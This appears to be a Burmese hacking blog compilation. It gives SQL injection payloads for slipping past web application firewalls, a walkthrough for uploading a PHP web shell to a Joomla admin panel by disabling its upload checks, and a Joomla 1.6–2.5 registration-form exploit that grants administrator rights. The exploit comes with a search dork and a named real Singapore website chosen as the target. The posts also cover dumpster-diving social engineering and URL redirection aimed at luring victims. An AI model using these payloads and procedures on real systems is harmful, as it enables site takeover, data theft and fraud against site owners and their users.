February 21, 2014

SQL Filter Evasion part 2 [tuto]
Method #2 Normally Bypassing Techniques
ဒါလည္း WAF ေက်ာ္တဲ့ နည္းတစ္ခုပါဘဲ part 1 တုန္းကလို
ေတာ့မဟုုတ္ဘူး ဒီမွာ က obfusication ကိုအဓိကသံုးတာေပါ့
WAF ဆိုတာက Web Application Firewall ပါ WAF is an appliance,server plugin, or filter
ေယဘူယ်အားျဖင့္ နာမည္ႀကီး Attack ေတြျဖစ္တဲ့ XSS တို႕ SQLi တို႕ကို
covers လုပ္တယ္ဆိုပါေတာ့ တခ်ိဳ႕က်ေတာ့လည္း Deep Packet Inspection Firewall လို႕ေခၚတယ္
ဘာလို႕လည္းဆိုေတာ့ HTTP/HTTPS/SOAP/XML-RPC/Web service lacers စတဲ့ Request ေတြ
response ေတြကိုေစာင့္ၾကည့္ေနရလို႕ပါတဲ့
ကဲ ေဖာတာမ်ားသြားျပန္ၿပီ Obfusicate လုပ္ပီး bypass လုပ္တဲ့ အေၾကာင္းေလး
စေဖာေတာ့မယ္

[001].Bypass with comments
WAF filter လုပ္ထားတာ ေတာ္ေတာ္မ်ားမ်ားကို SQL comments နဲ႕ bypass လုပ္လို႕ရနုိင္တယ္
bypass: id=1+un/**/ion+se/**/lect+1,2,3--

[002].Case Changing
တခ်ိုဳ႕ WAF ေတြမွာ lower case ေတြကိုဘဲ  filter လုပ္ထားတယ္
Filter: /union\sselect/g
Bypass: id=1+UnIoN/**/SeLecT/**/1,2,3--

[003].Replaced Keywords
တခ်ိဳ႕ WAF ေတြမွာ preg_replace ဆိုတဲ့ဟာကို သံုးပီး SQL keyword ေတြကို filter လုပ္ထားတယ္
ဒါဆိုလြယ္ပါတယ္ ေအာက္ကလို bypass လုပ္လိုက္မယ္
Bypass : id=1+UNunionION+SEselectLECT+1,2,3--
ေနာက္တမ်ိဳးက SQL keyword ေတြကို filter လုပ္ၿပီး white space ေတြကို
replace လုပ္တယ္ ဒီေတာ့
Bypass : id=1+uni%0bon+se%0blect+1,2,3--
ေနာက္တစ္ခု Mod_rewrite မွာ /**/ ကိုသံုးလို႕မရဘူး ဒီေတာ့ %0b ကိုသံုးမယ္

[004].Chacter Encoding
/**/union/* /select/**/1,2,3/**/from/**/users--
အဲဒါကို က်ေနာ္ တို႕ Encode လုပ္လိုက္ေတာ့
%252f%252a%252a%252funion%252f%252a%2520%252fselect%252f%252a%252a%252f1%252C2%252C3%252f%252a%252a%252ffrom%252f%252a%252a%252fusers--
ဒီလိုရသြားမယ္
Example:
1#Nuke Sentinel (Nuke Evolution)
// Check for UNION attack
        // Copyright 2004(c) Raven PHP Scripts
        $blocker_row = $blocker_array[1];
        if($blocker_row['activate'] > 0) {
          if (stristr($nsnst_const['query_string'],'+union+') OR \
        stristr($nsnst_const['query_string'],'%20union%20') OR \
        stristr($nsnst_const['query_string'],'*/union/*') OR \
        stristr($nsnst_const['query_string'],' union ') OR \
        stristr($nsnst_const['query_string_base64'],'+union+') OR \
        stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
        stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
        stristr($nsnst_const['query_string_base64'],' union ')) {  // block_ip($blocker_row);
           die("BLOCK IP 1 " );
          }
        }
အေပၚကသူ႕ရဲ႕ php code
ၤfilter: /**/union/**/select
Bypass: /%2A%2A/union/%2a%2a/select
Bypass : %2f**%2funion%2f**%2fselect

2#Mod Security CRS (credit : Johannes Dahse)
[SecRule]--------------------------------------------------------------------------
        SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
        t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
        msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
        tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
        setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
        setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
        [End Rule]-------------------------------------------------------------------------
ေအာက္က keyword နဲ႕ bypass လုပ္လို႕ရမယ္
bypass : id=0+div+1+union%23foo*%2f*bar%0D%0Aselect%23foo%0D0A%2C2%2Current_user
နည္းနည္းရွုပ္သြားမယ္ ထင္တယ္ က်ေနာ္ နားလည္သေလာက္ျပန္ရွင္းေပးမယ္
%0D%0A ကို new line character အတြက္သံုးထားတာပါ။
0 div 1 union#foo*/*/bar
select#foo
1,2,current_user
ဒီမွာ #,/,* တို႕ကို encode လုပ္ထားတယ္
ေနာက္ဆံုး execute လုပ္တဲ့ payload က ေအာက္ကလိုိျဖစ္သြားမယ္
0 div 1 union select 1,2,current_user

[005].Buffer Overflow
WAF ဟာ တကယ္လို႕ C programming Language နဲ႕ ေရးထားတာဆိုရင္
buffer overflow ကုိသံုးၿပီး bypass လုပ္လို႕ရနိုင္သတဲ့
Bypass: id=1+and+(select 0x41414141414141414141414141414141414.)+union+select+1,2,version(),database(),user(),6,7,8--

[006].Inline Comments (MySQL only)
Bypass : =/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
        /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

SQLi FIlter Eavision part 1



ဒါေလး မဆိုးဘူးထင္လို႔ မလာပါတယ္ အသံုး၀င္မယ္ထင္တာဘဲ
Bypass Technique ေတြေပါ့ ေတာ္ေတာ္စံုသဗ်
တတ္နိုင္သေလာက္ ျပန္ေရးထားတာပါဘဲ လိုအပ္တာေတြရွိရင္လည္း ၀င္ေရာက္ေဆြးေႏြးၾကဖို႕ဖိတ္ေခၚရင္း
စေဖာပါေတာ့မယ္
WAF bypassing Technique ေတြ အားႀကီးရွိတယ္မဟုတ္လား ဒီေတာ့ အပိုင္းေလးေတြနဲ႕
ေဖာထားတယ္ WAF ေက်ာ္တာေတြသိပ္နားမလည္းဘူးဆိုရင္ေတာ့ ဦးေဂါ့ ရဲ႕ HPP နဲ႕ ကစ္မရဲ႕
ေနာက္ကြယ္က အလုပ္လုပ္ပံုဆိုလား သြားဖတ္လုိက္မယ္ဆို (မဆိုးဘူး) တီးမိေခါက္မိ သြားမယ္
ေတာ္ေတာ္ေလးေကာင္းပါတယ္ ေရးထားၾကတာ link ေတာ့မေပးေတာ့ဘူး ကြကိုယ္ရွာေတာ့
Part 1 : Filter Evasion(Mysql)
[001].Block and , or
က်ေနာ္ တို႕သံုးခ်င္တဲ့ query က ေအာက္ကအတိုင္းဘဲဆိုပါေတာ့
1 or 1 = 1 (or) 1 and 1 = 1
WAF က ဘေလာ့ထားေလရဲ႕ ေအာက္ကလိုေက်ာ္လိုက္မယ္
1 || 1 = 1 (or) 1 && 1 = 1
သေဘာတရားခ်င္းကတူတူဘဲေလ || ကလည္း or ကို ေျပာတာဘဲ ဆိုတာ programmer ေတြေတာ့သိမွာပါ
&& ကလည္း and ဘဲ ျဖစ္တာကိုး
[002].Block UNION
Query: union select user,password from users
Bypass: (select user from users where user_id=1)= ’admin’
ဒီမွာဆိုရင္ေတာ့ က်ေနာ္ တို႕ကိုယ့္နည္းကိုယ့္ဟန္နဲ႕သိေအာင္လုပ္ဖို႕လိုတာေလးေတြရွိတယ္ေနာ္

[003].Block where
Query: (select user from users where user_id=1)= ‘admin’
Bypass: (select user from users limit 1)= ‘admin’
[004].Block limit
Query: (select user from users limit 1)= ‘admin’
Bypass : (select user from users group by user_id having user_id=1)= ‘admin’
[005].Block group by
Query: (select user from users group by user_id having user_id=1)= ‘admin’
Bypass: (select substr(group_concat(user_id),1,1) user from users)= ‘admin’
[006].Block SELECT
Query: (select substr(group_concat(user_id),1,1) user from users)= ‘admin’
Bypass: substr (user,1,1)= ‘a’
Bypass: 1 =1 into outfile ‘result.txt’
[007].Block ‘(single quote)
Query: substr (user,1,1)= ‘a’
Bypass : substr (user,1,1)= 0x61
Bypass: substr (user,1,1)=unhex(61)
[008].Block Hex
Query: substr (user,1,1)=unhex(61)
Bypass : substr (user,1,1)= lower (conv(11 ,10 ,36))

[009].Block substr
Query: substr(user,1,1)=lower (conv(11 ,10 ,36 ))
Bypass:  lpad(user,7,1)
[010].Block white space
Query :  lpad(user,7,1)
Bypass:%0blpad(user,7,1)
Bypass: /**/lpad(user,7,1)
ေလာေလာဆယ္ေတာ့ part 1 ဘဲေနာ္ ေနာက္မွဆက္ေရးမယ္ part 2ဆိုပီး
ေက်းဇူးတင္ပါတယ္ ခုလို စိတ္ညစ္ခံဖတ္ရွုေပးတဲ့အတြက္ …..
Credit : ZeQ3uL

White space are blocked from WAF



ကဲခုက်ဴတိုေလးလည္း ေတြ႕ထားတာၾကာေနပါၿပီ မအားတာနဲ႕မေရးျဖစ္ဘူး…….
ကိုသစ္ပင္ႀကီးခ်ဲလန္႕ေတြ႕မွ ေရးဖုိ႕အႀကံရသြားတာ ဟိဟိ
တခ်ိဳ႕ ဆိုက္ေတြမွာ WAF ေတြဟာ space ေနရာေတြကို block ထားေလသတဲ့
ဒါဆိုဘယ္လိုေက်ာ္ရမလဲ ဆိုတာ ဒီက်ဴတိုကိုဖတ္ၿပီး ရင္ သိနိုင္ပါတယ္
တခ်ိဳ႕ WAF ေတြ က်ေတာ့လည္း ( ,) ,/ ေတြကိုပါ block ထားေလတယ္
ကဲစေဖာမယ္
Method 1# Adding /**/ or %0a to white space
က်ေနာ္ တို႕ ေအာက္က query က ပံုမွန္ က်ေနာ္တို႕ထိုးတဲ့ ပံုစံေပါ့ေလ
Union select 1,2,3,4
အဲဒါကို space ေနရာေတြမွာ WAF က block ထားမယ္ဆိုရင္ က်ေနာ္ တို႕ vul column ကိုရနိုင္မွမဟုတ္ဘူး
ဒီေတာ့ Space ေနရာေတြမွာ /**/ ကိုအစားသြင္းႀကည့္မယ္
ေအာက္ကလိုပံုစံမိ်ဳးျဖစ္သြားမယ္
/**/union/**/select/**/1,2,3,4
ေနာက္တစ္နည္းက %0a ထည့္မယ္ အေပၚကလို က်ေတာ့ WAF က / ကိုဘေလာ့ထားတယ္ ဆိုမရဘူးေလ
%0union%0aselect%0a1,2,3,4
Method 2#Using ()
ဒါကေတာ့ေနာက္တစ္နည္းေပါ့
Union(select(1),(2),(3),(4))
ဒါမွမဟုတ္
Union(select(1),2,3,4)
ေက်းဇူးတင္ပါတယ္ေညာ္ ဒီေလာက္ပါဘဲ ( ) ေတြကိုလည္း တခ်ိဳ႕ WAF ေတြက ဘေလာ့ထားျပန္သတဲ့
ဟိဟိ ေတာ္ေတာ္ မ်ားေနပီ ဘေလာ့တာ ရွာၾကပါဦးေနာ္ အဲဟာဘယ္လိုေက်ာ္ရမလဲ သိလည္းေျပာၾကပါဦး
 Credit: Ajkaro

February 11, 2014

How to upload shell in Joomla site

Joomla site မွာ shell ကုိဘယ္လုိ upload တင္ၾကမလဲ...
သိၿပီးသားလူေတြလည္းရွိမွာေပါ့ေနာ္..
ဘာပဲျဖစ္ျဖစ္တင္ေပးလုိက္ပါမယ္..
အရင္ဆံုး joomla admin access ကုိ ဘယ္နည္းနဲ႔ပဲျဖစ္ျဖစ္ရသြားၿပီဆုိပါစုိ႔..
Admin panel ထဲေရာက္သြားၿပီဆုိရင္ ကၽြန္ေတာ္တုိ႔ shell တင္ႏုိင္မွ ဒီဆုိက္ကုိ
control လုပ္လုိ႔ရမွာေလ...
အရင္ဆံုး shell ရွိဖုိ႔လုိပါတယ္..
http://www.sh3ll.org
မွာသြားၿပီး စိတ္ႀကိဳက္ shell ေဒါင္းလုဒ္ဆြဲပါ...
ကၽြန္ေတာ္ကေတာ့ wso ကုိအခုထိသံုးတုန္းပါပဲ...
အုိေက Admin Access ရထားတဲ့ဆုိက္ထဲကုိ၀င္မယ္
ေအာက္ကပံုအတုိင္းျမင္ရမွာျဖစ္ပါတယ္..

[Image: A0XiLXz.jpg]

Media Manager ကုိႏွိပ္ၿပီး၀င္လုိက္ပါ...
ေအာက္ကပံုအတုိင္းေတြ႔ရပါမယ္..

[Image: kvhQcnq.jpg]

Media Manager မွာသြားတင္မွာျဖစ္ပါတယ္..
ဒါေပမယ့္ ကၽြန္ေတာ္တုိ႔တင္မယ့္ shell က php extension ျဖစ္တဲ့အတြက္
media manager မွာ php extention တင္ခြင့္ေပးလားမေပးလားအရင္ဆံုးၾကည္႔ရပါမယ္..
php extension တင္ခြင့္မေပးရင္ extension ေနရာမွာ php ထည့္ၿပီးတင္ရမွာပါ..
php extension တင္ခြင့္ေပး မေပးသိရေအာင္ ညာဘက္ေထာင့္က
option ေလးကုိႏွိပ္လုိက္ပါ

Legal Extensions (File Types) မွာ php မပါရင္ ,php ေပါင္းထည့္ေပး
Legal MIME Types မွာ php မပါရင္ ,php ေပါင္းထည့္ေပးၿပီး

Restrict Uploads နဲ႔ Check MIME Types ကုိ No ထားလုိက္ပါ..
ေအာက္ကပံုအတုိင္းေပါ့..

[Image: Ztjz0vy.jpg]

Save & Close ကုိႏွိပ္လုိက္ပါ...
Browse ကုိႏွိပ္ၿပီး မိမိ shell ကို upload တင္လုိက္ရံုပါပဲ..
shell link ကုိေတာ..


Code:
www.site.com/images/yourshell.php

[Image: yQfYCOx.jpg]

ကေနတစ္ဆင့္ျပန္ေခၚႏုိင္ပါတယ္..
သိၿပီးသားလူေတြအတြက္ကေတာ့ ေဆာ္ဒီးပါ...
မသိေသးတဲ့သူေတြအတြက္ ရည္ရြယ္တာပါ..

Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

ကဲ ဒီက်ဴတိုကို ေရးသားသူ ကေတာ့ ကိုကရင္မ ပဲျဖစ္ပါတယ္ ခညာ
အဖိုးတန္က်ဴတိုေတြမို႕ မူလလက္ေဟာင္း ပံုစံအတိုင္းျပန္တင္လိုက္ပါတယ္
ဖတ္ၿပီးစမ္းၾကည့္ပါဦး
ဒီ exploit ေလးကေတာ့ ေပၚတာၾကာပါၿပီ...
အရင္ MHU မွာတုန္းက ကုလားဆုိက္ေတာ္ေတာ္မ်ားမ်ားကုိ ကစ္တာ အဓိကထားၿပီးသံုးတဲ့ exploit ေလးပါ..
မသိတဲ့သူေတြရွိရင္ ရွိႏုိင္တဲ့အတြက္ ျပန္တင္ေပးလုိက္တာပါ..
အရင္ MHU မွာတုန္းကလည္း ကၽြန္ေတာ္တစ္ေခါက္တင္ေပးဖူးပါတယ္..
Joomla site ရဲ႕ Registery form မွာ exploit ျဖစ္တာပါ..
Joomla! 1.6/1.7/2.5 အစရွိတဲ့ ဗားရွင္းေတြမွာအဓိကျဖစ္တာပါ..
ကဲ က်ဴတုိေလးစရေအာင္..

လုိအပ္တာေတြကေတာ့

0x01: Firebug addon (https://addons.mozilla.org/en-US/firefox/addon/firebug/ )
0x02: google dork (inurl:"?view=registration")
0x03: <input name="jform[groups][]" value="7">


အရင္ဆံုး ကၽြန္ေတာ္တုိ႔ Firebug add on ေလးသြင္းလုိက္ပါ...
အခုကၽြန္ေတာ္ေပးထားတဲ့ add on က mozilla အတြက္ပါ..
Chrome သမားေတြဆုိ chrome firebug add on သြင္းေပါ့..

သြင္းၿပီးၿပီဆုိ.. Google မွာ.. dork နဲ႔ရွာရေအာင္...

inurl:"?view=registration"
ကၽြန္ေတာ္တုိ႔ Target ထားတဲ့ဒုိမိန္းကုိလည္းထည္႕လုိ႔ရပါတယ္..
မေလး၊ အင္ဒုိအစရွိတဲ့ ဒုိမိန္းေတြကေတာ့ MHU က bro ေတြ စမ္းလုိ႔ ကုန္ေလာက္ပါၿပီ... သူမ်ားသိပ္မစမ္းတဲ့ singapore domain နဲ႔ကင္ရေအာင္..
(မွတ္ခ်က္ || စင္ကာပူမွာေနတဲ့သူေတြေတာ့ မစမ္းၾကပါနဲ႔.. အန္ဒရာယ္မ်ားလြန္းပါတယ္)

inurl:"?view=registration" site:sg

က်လာတဲ့ဆုိက္ေတြထဲက တစ္ခုကုိကၽြန္ေတာ္ေရြးလုိက္ပါၿပီ..

http://www.beyondedge.com.sg/component/u...gistration

အဲ့ဒီဆုိက္ကုိေပါ့...
Registry လုပ္ဖုိ႔ Registry Form ကုိေတြ႔ရပါတယ္...

Name ေနရာမွာ..ကုိယ့္စိတ္ႀကိဳက္နာမည္..
Username ေနရာမွာ စိတ္ႀကိဳက္နာမည္..
Password နဲ႔ Confirm password ကုိ မတူေအာင္ေပး
Email မွာကုိယ့္အီးေမးလ္ထည့္
confirm ေနရာမွာ အီးေမးလ္ျပန္ထည့္ၿပီး.. Right click ေထာက္ၿပီး
Inspect element with firebug ဆုိတာႏွိပ္လုိက္ပါ..

[Image: DOMWrKN.jpg]

Firebug ဖြင့္လာရင္ Edit ဆုိတာကုိႏွိပ္ၿပီး

<input name="jform[groups][]" value="7">

အဲ့ဒီ jform ေလးကုိ..copy ယူၿပီး..ေနာက္ဆံုးစာေၾကာင္းမွာ past ခ်လုိက္ပါ
confirm email မွာ ကုိယ့္ အီးေမးလ္ကုိျပန္ထည္႕လုိက္ပါ..

[Image: 0yLStR0.jpg]

Registry ကုိႏွိပ္လုိက္ပါ...

password မတူတဲ့အေၾကာင္းစာေပၚလာပါမယ္..
ဒါဆုိ password တူေအာင္ျပန္ရုိက္ထည္႔ေပးၿပီး.
Registry ႏွိပ္ေပးလုိက္ပါ..
ေမးလ္ထဲကုိ activated လုပ္ဖုိ႔ေရာက္လာရင္ သြားဖြင့္ၿပီး ဆုိက္ကုိ..
http://www.site.com/administrator လို႔ေျပာင္းလုိက္ပါ..
ဒါက Joomla ရဲ႕ Admin page ျဖစ္လုိ႔ပါ..
ၿပီးရင္Registery လုပ္တုန္းက ထည့္ထားတဲ့ User name & password ကုိ
Admin panel မွာထည့္လုိက္ပါ..

Bingo Admin panel ထဲေရာက္သြာူးပါၿပီ..

[Image: ZyVJ3qs.jpg]

Admin access ရသြားရင္ shell တင္ဖုိ႔အတြက္ကေတာ့

http://www.4sectors.com/forum/showthread.php?tid=307

အဲ့ဒီမွာ ကၽြန္ေတာ္က်ဴတုိေရးေပးဖူးထားပါတယ္..
ဆုိက္ကုိေတာ့ ဘာမွမလုပ္ၾကဖုိ႔ေတာင္းဆုိခ်င္ပါတယ္..
For Education only

Thanx for reading     

February 10, 2014

Dumpster Diving[Social Enginnering]


Dumpster diving ဆိုတာဘာလဲ?
သူက ေတာ့ trash တို႕ recyle bin တို႕ ကေန information ေတြကို ျပန္ယူတာကိုေျပာတာပါ။ဒီနည္းလမ္းဟာ အရမ္းကို popular ျဖစ္ခဲ့ ပါတယ္
phiysical penetration ဆိုတဲ့ အတိုင္း ဘာ language မွလည္းတတ္စရာမလိုဘူးေလဟိဟိ
Kevin Mitnick ဆိုတဲ့ နာမည္ႀကီး ဟက္ကာ ေဟာင္းႀကီး ေတာင္မွ ဒီနည္းကိုသံုးခဲ့ တယ္ဆိုဘဲ
သူက တခ်ိန္တုန္းက SE နဲ႕နာမည္ႀကီးခဲ့တဲ့ ဟက္ကာတေယာက္လို႕ဆိုပါတယ္(အေနာ္မွမသိတာ)

က်ေနာ္ တို႕ ရံုးေတြမွာ ျမင္ဖူးမွာေပါ့ စာရြက္တစ္ရြက္
အဲ့စာရြက္ထဲမွာ မွားေနတာ က  ၁ ခု ၂ ခုရယ္ မွားတယ္ဆိုပီး ဆရာသမားက အမွိုက္ပံုးထဲ သြားထည့္မယ္
ဒီခ်ိန္ မွာ အဲ့စာရြက္ကို ရသြားမယ္ဆိုရင္ က်ေနာ္ တို႕အတြက္အသံုးမ၀င္ဘူးလား?
၀င္တာေပါ့ေနာ္ မွားေနတာက ၁ ခု ၂ခု ေလ က်န္တဲ့ information အမွန္ေတြကိုရနိုင္တာေပါ့

ျမင္ေအာင္ေသခ်ာျပပါမယ္
1# Network Diagram
Network ကိုေဖာက္ဖို႕ႀကံစည္ေနတဲ့ ဟက္ကာ တေယာက္ဟာ ေအာက္မွာျပထားတဲ့ ပံုထဲကလို Network Diagram (Network Infrastructure) တစ္ခုကို ရလိုက္ပီဆို
သူ႕အတြက္ အေတာ္ကုိလြယ္ကူသြားပါလိမ့္မယ္



2# Headed Paper
တခ်ိဳ႕company ေတြမွာ Headed paper ေတြထုတ္ေပးတာျမင္ဖူးမွာေပါ့ အေနာ္လုပ္ဖူးတဲ့ company မွာေတာ့ ေပးတယ္ခမ်
Department တိုင္းကိုေပးတာပါ က်ေနာ့္ကို အလုပ္ခန္႕လိုက္တယ္ က်ေနာ့္ရဲ႕ information အနည္းငယ္လည္းပါ၀င္တာေပါ့
က်ေနာ္ကလြဲရင္ အားလံုးက go to the gabage ပါဘဲ
အဲ့လိုစာရြက္ေတြကေနလည္း information ေတြရနိင္ေသးတယ္

3# Invoices
ဒါကေတာ့ vocher ေတြပဲဆိုပါစို႕။ ဟင္းရြက္ကန္ဇြန္းေရာင္းတဲ့ ဟာေတြေတာ့ သြားမေကာက္နဲ႕ေနာ္ ဟိဟိ
တကယ့္ company ႀကီးေတြမွာဆို က်က်နန ေရးၾကတာဗ် 
ေအာက္မွာပံုျပထားပါတယ္ ၀ယ္တဲ့ သူရဲ႕ အခ်က္လက္အခ်ိဳ႕ ေရာင္းတဲ့ company ရဲ႕ အခ်က္အလက္အခ်ိဳ႕ ကိုရနိုင္ပါတယ္
အနည္းဆံုးေတာ့ ေစ်းႏွဳန္းပါမယ္ ဒါေတြဟာလည္းသံုးတတ္ရင္ အက်ိဳးရွိတာပါဘဲ






4# Username & Passwrod
ေအာက္ကပံုကို အရင္ၾကည့္လိုက္ပါ တခ်ိဳ႕အဲလိုလုပ္ၾကပါတယ္ ဟုတ္ၿပီ
အဲ့စာရြက္ေလးက ေကာ္ကြာသြားတယ္ဆိုပါေတာ့ အိမ္က အေမက ေအာက္မွာက်ေနလို႕ အမွိဳက္ပံုးထဲ ေစတနာနဲ႕ေကာက္ထည့္ရင္ သင္ username & password ကိုရၿပီ


5# Electronic & Media
သင့္ကို ေမးခြန္းတစ္ခုအရင္ေမးခ်င္တယ္ USB Stick ေပ်ာက္ဖူးလား?
မေပ်ာက္ဖူးဘူးဆိုရင္ေတာ့ သင္ဟာ က်ေနာ္ နဲ႕မတူဘဲ အလြန္စည္းကမ္း ရွိတဲ့သူျဖစ္မွာပါ ဟိဟိ
Information Leckage ျဖစ္တယ္ဆိုတာ 70% က user ေၾကာင့္ပါဘဲတဲ့ စည္းကမ္းမွမရွိတာ (က်ေနာ့လိုေပါ့)
ေနာက္တခုက ေတာ့ recovery software ေတြလည္းၾကားဖူးမွာေပါ့ မၾကားဖူးဘူးဆိုရင္ေတာ့ ေအာက္မွာ comment ေရးခဲ့ တင္ေပးမယ္ ဟိ
က်ေနာ္ တို႕ရဲ႕ USB တို႕ hard disk တို႕ဆိုတာ က်ေနာ္တို႕ delete လုပ္လိုက္ေပမယ္ ့ အၿပီးပိုင္ပ်က္သြားတာမ်ိဳးမဟုတ္ပါဘူး
magnetic circle ရဲ႕ အျပင္ဖက္ကို ေရာက္သြားတဲ့ သေဘာပါ ဒီေတာ့ recover လုပ္နိုင္ပါတယ္
ဖုန္းတစ္လံုးဆိုပါစို႕ အဲ့ဖုန္းထဲမွာ သင္က ဟီဟီဟာဟာ လုပ္ၿပီး ေကာင္မေလးတေယာက္နဲ႕ ဘာညာပံုေတြ ရိုက္ထားတယ္
ခဏေနေတာ့ ဖ်က္လိုက္တယ္ သိပ္မၾကာဘူး ဖုန္းပ်က္သြားတယ္ ဖုန္းဆိုင္သြားပို႕တယ္ ဖုန္းဆိုင္မွာက ဒီ က်ဴတိုကိုဖတ္ထားတဲ့ အေနာ့္လို ငတိတစ္ေကာင္ရွိတယ္ဆိုပါစုိ႕
(သင့္ဘ၀က မေတြး၀ံ့စရာပါ) ဟိဟိ


6# Handbooks,Manuals And Operating Procddures
တခ်ိဳ႕ company ေတြမွာ company စည္းကမ္းေတြ လုပ္ေဆာင္ရမယ့္ အရာေတြ ေနာက္ေတာ့ သူတို႕ရဲဲ႕ ရည္မွန္းခ်က္ (goal) ေတြကို handbook အေနနဲ႕ေပးၾကပါတယ္
ေနာက္ ၃ လၾကာေတာ့ company ကစာအုပ္ အသစ္ထပ္ထုတ္တယ္ update လုပ္တာေပါ့
go to trash လုပ္ၾကျပန္ေရာ အေနာ္ ရရင္ေတာ့ ဘာမွမျဖစ္ဘူး လိမ္လည္မယ့္ လူလိမ္တစ္ေယာက္အတြက္ ေတာ့ အသံုး၀င္မွာပါ


7# Signature
သင့္ရဲ႕ signature ပါတဲ့ စာရြက္ကို အမွိဳက္ပံုးထဲ ထည့္ဖူးပါသလား?
က်ေနာ္ ဆိုရင္ေတာ့ အိမ္က ေငြလြွဲထားတဲ့ စာရြက္ေတြမွာ လက္မွတ္ထိုးတာမနည္ပါဘူး တခါတေလ မွတ္ပံုတင္ နံပါတ္ေတာင္ပါေသး
သင္ Catch me if u can ၾကည့္ဖူးရင္ လက္မွတ္ေတြဘယ္လို အသံုး၀င္လဲဆိုတာသိမွာပါ


8# Shredder paper
ကဲေနာက္ဆံုးတစ္ခုက Shredder နဲ႕ သမထားတဲ့ စာရြက္ေတြေတာင္ 100% မလံုၿခံဳပါဘူးတဲ့
ဘာလို႕လဲဆို သင္ ျပန္ၿပီးေတာ့ reconstruct လုပ္နိုင္တယ္ေလ
Unshredder ေတြျဖစ္သြားတာေပါ့လို႕ ဟိဟိ



အဆင္ေျပၾကမယ္ထင္ပါတယ္
တစ္ခုမွာခ်င္တာကေတာ့ စည္းကမ္းရွိပါေနာ္ မာမီတို႕

Ways of Redirection

ခု က်ဴတိုရီယယ္ က က်ေနာ္ ေရးထားတာ မဟုတ္ပါဘူး
က်ေနာ္ တို႕ရဲ႕ အကိုႀကီး $nifferg0d ေရးထားတာပါ myanmar hack forum တုန္းကေပါ့
ခုလိုရွားပါးၿပီး တန္ဖိုးရွိတဲ့ က်ဴတိုကို ျပန္ရွဲနိုင္ေအာင္ သိမ္းထားတာကေတာ့ က်ေနာ္ မဟုတ္ျပန္ဘူး
ကုိ blackkidde ပါ ဟိဟိ တယ္ေတာ္ တဲ့ ငါပါလား မူရင္းအတိုင္းဘဲ ျပန္တင္ေပးထားပါတယ္ ခမ်ား

Ways Of Redirection!!
ဖုိရမ္မွာ ညီအစ္ကုိေတြ ပုိစ္႔ေတြ ေရးျပီးတင္ၾကတာျမင္ေတာ႔ ကြ်န္ေတာ္လဲ နဲနေရးခ်င္စိတ္ေပါက္လာတယ္….ဒါနဲ႔ ဘာေရးရရင္ေကာင္းမလဲလုိ႔ စဥ္းစားလိုက္ေတာ႔ URL တစ္ခုကုိ ဘယ္လုိ redirection လုပ္ၾကသလဲဆုိတာေလးကုိ သြားစဥ္းစားမိတယ္ ။ URL redirection ကုိ ဘာအတြက္သုံးၾကသလဲ ၊ ဘယ္လုိအေျခအေနမ်ဳိးမွာ သုံးၾကသလဲ ဆုိရင္ ဆုိဒ္တစ္ခုကေန ေနာက္ထပ္ဆုိဒ္အသစ္တစ္ခုကုိ ေျပာင္းလဲဖြင္႔လွစ္တဲ႔ အခါမ်ဳိးမွာ(သုိ႔တည္းမဟုတ္) Attacker တစ္ေယာက္က victim ကုိမိမိဖန္တီးထားတဲ႔ လွည္႔ကြက္ေထာင္ေခ်ာက္ေနရာ တစ္ခုဆီကုိေရာက္ေစခ်င္တဲ႔အခါမ်ဳိးမွာ အမ်ားဆုံးအသုံးျပဳေလ႔ ရွိၾကပါတယ္ ။ ကဲပထမဆုံး ကြ်န္ေတာ္တုိ႔ Website တစ္ခုကေန အျခားတစ္ခုကုိ စျပီး Redirect လုပ္ၾကမယ္ဆုိရင္ URL redirect လုပ္ဖုိ႔ တခဏတာ ယာယီလား ၊ အျမဲတမ္းအတြက္လားဆုိတာကုိ စျပီး စဥ္းစားဖုိ႔လုိပါလိမ္႔မယ္ ။ ေနာက္တစ္ခ်က္က ဘယ္လုိ language မ်ဳိးကုိအသုံးျပဳျပီး URL redirect script ကုိတည္ေဆာက္မွာလဲ ။ ဒီေနရာမွာ ကြ်န္ေတာ္ ဥပမာ သုံးမ်ဳိးနဲ႔ တင္ျပသြားပါမယ္ …. ။
1. PHP script ကုိအသုံးျပဳ၍တည္ေဆာက္ျခင္း ။
2.Htaccess with mod_rewrite (or) mod_alias နည္းလမ္းျဖင္႔ တည္ေဆာက္ျခင္း ။
3.Javascript ျဖင္႔ဖန္တီးျခင္း တုိ႔ပဲျဖစ္ပါတယ္ ။
ဥပမာေတြ ဘာေတြနဲ႔ တင္ျပမယ္ဆုိေတာ႔ ဘာေတြပါလိမ္႔….ရွဳပ္ေနမွာလားဆုိျပီး မထင္လုိက္ပါနဲ႔….လုံးဝမွားသြားပါလိမ္႔မယ္….စားေၾကာင္းေလး ႏွစ္ေၾကာင္းတည္းရယ္ပါ ။

1.PHP script ကုိအသုံးျပဳျပီးတည္ေဆာက္ျခင္း
PHP Language မွ header() function ကုိအသုံးျပဳျပီး ယာယီအေနနဲ႔ redirect (သူ႔ရဲ႔ Status Code Definition က 302 ပါ ။ မိမိရွာေဖြတဲ႔ address ကမရွိေတာ႔ပါဘူး ၊ အျခားတစ္ေနရာသုိ႔ ေရႊ႔ေျပာင္းသြားပါျပီ လုိ႔ ဆုိလုိပါတယ္ ) လုပ္ဖုိ႔အတြက္ မိမိ redirect လုပ္လုိတဲ႔ URL address ကုိထည္႔သြင္းလုိက္ျခင္းပင္ျဖစ္ပါတယ္ …။ ဥပမာ-

<?php
header('Location: http://www.mmhackforums.com');
exit;
?>

